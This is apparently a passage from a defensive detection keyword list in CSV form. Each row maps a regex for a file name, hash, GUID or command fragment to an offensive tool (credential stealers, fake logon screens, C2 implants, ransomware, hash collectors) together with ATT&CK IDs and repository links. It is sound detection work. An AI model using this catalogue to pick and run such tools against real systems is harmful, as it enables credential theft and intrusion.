"*Fake-Cmdline.exe*",".{0,1000}Fake\-Cmdline\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","44438"
"*FakeDriver.java*",".{0,1000}FakeDriver\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","44439"
"*FakeDriver2.java*",".{0,1000}FakeDriver2\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","44440"
"*fakefuse.c*",".{0,1000}fakefuse\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","N/A","4","369","56","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z","44441"
"*fakefuse.h*",".{0,1000}fakefuse\.h.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","N/A","4","369","56","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z","44442"
"*FakeImageExploiter*",".{0,1000}FakeImageExploiter.{0,1000}","offensive_tool_keyword","FakeImageExploiter","This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.","T1564 - T1218 - T1204 - T1558.001","TA0002 - TA0008 - TA0010","N/A","N/A","Phishing","https://github.com/r00t-3xp10it/FakeImageExploiter","1","1","N/A","N/A","N/A","10","912","338","2019-12-06T20:59:26Z","2017-04-04T20:53:47Z","44443"
"*fakelogonscreen*.zip*",".{0,1000}fakelogonscreen.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","44444"
"*FakeLogonScreen.csproj*",".{0,1000}FakeLogonScreen\.csproj.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","44445"
"*FakeLogonScreen.Properties.Resources*",".{0,1000}FakeLogonScreen\.Properties\.Resources.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#content","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","44446"
"*FakeLogonScreen_trunk.zip*",".{0,1000}FakeLogonScreen_trunk\.zip.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","44447"
"*FakeLogonScreenToFile.exe*",".{0,1000}FakeLogonScreenToFile\.exe.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","44448"
"*fakepath31337*",".{0,1000}fakepath31337.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","44449"
"*FakePPID.*",".{0,1000}FakePPID\..{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","44450"
"*fake-sms-main*",".{0,1000}fake\-sms\-main.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","N/A","8","10","2745","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z","44451"
"*faketime '202* zsh*",".{0,1000}faketime\s\'202.{0,1000}\szsh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44452"
"*FalconForceTeam/SOAPHound*",".{0,1000}FalconForceTeam\/SOAPHound.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","44453"
"*farmer.exe *\windows\temp*",".{0,1000}farmer\.exe\s.{0,1000}\\windows\\temp.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","44454"
"*farmer.exe 8888 60*",".{0,1000}farmer\.exe\s8888\s60.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","44455"
"*Farmer\Farmer.csproj*",".{0,1000}Farmer\\Farmer\.csproj.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","44456"
"*Farmer-main.zip*",".{0,1000}Farmer\-main\.zip.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","44457"
"*farusbig@tutanota.com*",".{0,1000}farusbig\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","44458"
"*fast_decrypt_and_protect@tutanota.com*",".{0,1000}fast_decrypt_and_protect\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","44460"
"*fastfuz-chrome-ext*files.txt*",".{0,1000}fastfuz\-chrome\-ext.{0,1000}files\.txt.{0,1000}","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Vulnerability Scanner","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","N/A","1","25","5","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z","44461"
"*FastjsonScan.jar*",".{0,1000}FastjsonScan\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","44462"
"*fasttrack/wordlist.txt*",".{0,1000}fasttrack\/wordlist\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","44463"
"*favfreak-http*",".{0,1000}favfreak\-http.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","44466"
"*fb094bd7cf03a1e0600f9b5efe757443fcd029ba98aabfd3bb6bd3f57c8bb45e*",".{0,1000}fb094bd7cf03a1e0600f9b5efe757443fcd029ba98aabfd3bb6bd3f57c8bb45e.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44468"
"*fb0eea49ed916aaa5428e80e86aa1136486e00f82637e099aa30469a434949f8*",".{0,1000}fb0eea49ed916aaa5428e80e86aa1136486e00f82637e099aa30469a434949f8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44469"
"*fb120f28b0e4d979b147635e9549362bb12e35d4b24a345fc5f208dd089ae4cb*",".{0,1000}fb120f28b0e4d979b147635e9549362bb12e35d4b24a345fc5f208dd089ae4cb.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44471"
"*fb19ad10ef4970540e0715a263a97025dc4b3e86cf94082ab4e8224a22952ac1*",".{0,1000}fb19ad10ef4970540e0715a263a97025dc4b3e86cf94082ab4e8224a22952ac1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44472"
"*fb20b0f19aab92962085d0d2fbf21ccc142620e12b6cccc20f28387b6c379d65*",".{0,1000}fb20b0f19aab92962085d0d2fbf21ccc142620e12b6cccc20f28387b6c379d65.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","44473"
"*fb303e1f4c1afc4224f63622d445bf01fd55b4e54f7dbab5cb196a5ab55bfd36*",".{0,1000}fb303e1f4c1afc4224f63622d445bf01fd55b4e54f7dbab5cb196a5ab55bfd36.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44476"
"*FB351327-0816-448B-8FB7-63B550D6C808*",".{0,1000}FB351327\-0816\-448B\-8FB7\-63B550D6C808.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005  - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","0","#GUIDproject","N/A","7","2","145","25","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z","44477"
"*fb38c399cf5ca62246e5f7ffdf4b0d65ec634efdaca466d5c6edb8ad2a5b5e5e*",".{0,1000}fb38c399cf5ca62246e5f7ffdf4b0d65ec634efdaca466d5c6edb8ad2a5b5e5e.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44478"
"*fb38cc904ebf94d6935270a46826254c413b9bc8cd69e9bafbe03998cdaea129*",".{0,1000}fb38cc904ebf94d6935270a46826254c413b9bc8cd69e9bafbe03998cdaea129.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44479"
"*fb3fc9cf96316c4e18a633564cfc32f0345a14ec544715fdeb23a8e773d7d46b*",".{0,1000}fb3fc9cf96316c4e18a633564cfc32f0345a14ec544715fdeb23a8e773d7d46b.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","44481"
"*fb436b85f221c5640e979d594788e7b377099191e153b76b16cc6f209b241528*",".{0,1000}fb436b85f221c5640e979d594788e7b377099191e153b76b16cc6f209b241528.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44482"
"*fb4433e34eea9a727c126b2b806b9a064e4f332ddd32964f0838f2331a61e471*",".{0,1000}fb4433e34eea9a727c126b2b806b9a064e4f332ddd32964f0838f2331a61e471.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44483"
"*fb4983dc113b5fa5802639a9165564afa619e5c68997e62da4ce227ae7694700*",".{0,1000}fb4983dc113b5fa5802639a9165564afa619e5c68997e62da4ce227ae7694700.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","44485"
"*fb4a9c6269ea58b893c6978105fd3e2b2bc6e72e24715c1824b45f40c87b850d*",".{0,1000}fb4a9c6269ea58b893c6978105fd3e2b2bc6e72e24715c1824b45f40c87b850d.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","44486"
"*fb5490f0675eb7ff5a4f76341e77a1bec6b77d3546c9a779676285d0c2d3255c*",".{0,1000}fb5490f0675eb7ff5a4f76341e77a1bec6b77d3546c9a779676285d0c2d3255c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","44489"
"*fb5ae202219536d7864043594d2c0b2909a956c5c88e33afc8efe588f5d84296*",".{0,1000}fb5ae202219536d7864043594d2c0b2909a956c5c88e33afc8efe588f5d84296.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","44490"
"*fb6a2914759e6644c5067b1b7308bc295d4b6b357b1ad9f904b430ba588654f8*",".{0,1000}fb6a2914759e6644c5067b1b7308bc295d4b6b357b1ad9f904b430ba588654f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44493"
"*fb74046f994a179d004abc1f9a6a00ffa8867dc011d2e2e9ca432fe9225227c2*",".{0,1000}fb74046f994a179d004abc1f9a6a00ffa8867dc011d2e2e9ca432fe9225227c2.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","44494"
"*fb785781e1e83a00582d1d3348c70249c256db03ddc4513f5b1a0853949b76ba*",".{0,1000}fb785781e1e83a00582d1d3348c70249c256db03ddc4513f5b1a0853949b76ba.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","44496"
"*fb808cc0dbbe0b6cd1a58631befb038483fc3043175232cf7d5f9a0d29b31895*",".{0,1000}fb808cc0dbbe0b6cd1a58631befb038483fc3043175232cf7d5f9a0d29b31895.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","44498"
"*fb834d272d81fcdad1dbceeaf118960fce2e0398a4ab47640fdbd139db9b947a*",".{0,1000}fb834d272d81fcdad1dbceeaf118960fce2e0398a4ab47640fdbd139db9b947a.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","44499"
"*fb84be2d35811783dc2a2f6d1b1a80e4173c2f204f60a595f110134e3df5fee4*",".{0,1000}fb84be2d35811783dc2a2f6d1b1a80e4173c2f204f60a595f110134e3df5fee4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","44500"
"*fb88b7cf0b5a1136829a3cf1c25f536713e6d7033c8b95cf31ea1e1c14c33a55*",".{0,1000}fb88b7cf0b5a1136829a3cf1c25f536713e6d7033c8b95cf31ea1e1c14c33a55.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44502"
"*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*",".{0,1000}fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","#filehash","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","44503"
"*fb8c1454ea22ccc9d97cbd90692d38c3c63d551680f6632fe658598a9bb23c03*",".{0,1000}fb8c1454ea22ccc9d97cbd90692d38c3c63d551680f6632fe658598a9bb23c03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44504"
"*fb8e1c7fbb5f253cffd87b965e587b4cb611ca2e5a38a13db70a082d8b8fe49c*",".{0,1000}fb8e1c7fbb5f253cffd87b965e587b4cb611ca2e5a38a13db70a082d8b8fe49c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44505"
"*fb93ead7778fa1593e651220420a86f63afcf3fdfc673f19c801b5de71ab5ac8*",".{0,1000}fb93ead7778fa1593e651220420a86f63afcf3fdfc673f19c801b5de71ab5ac8.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44506"
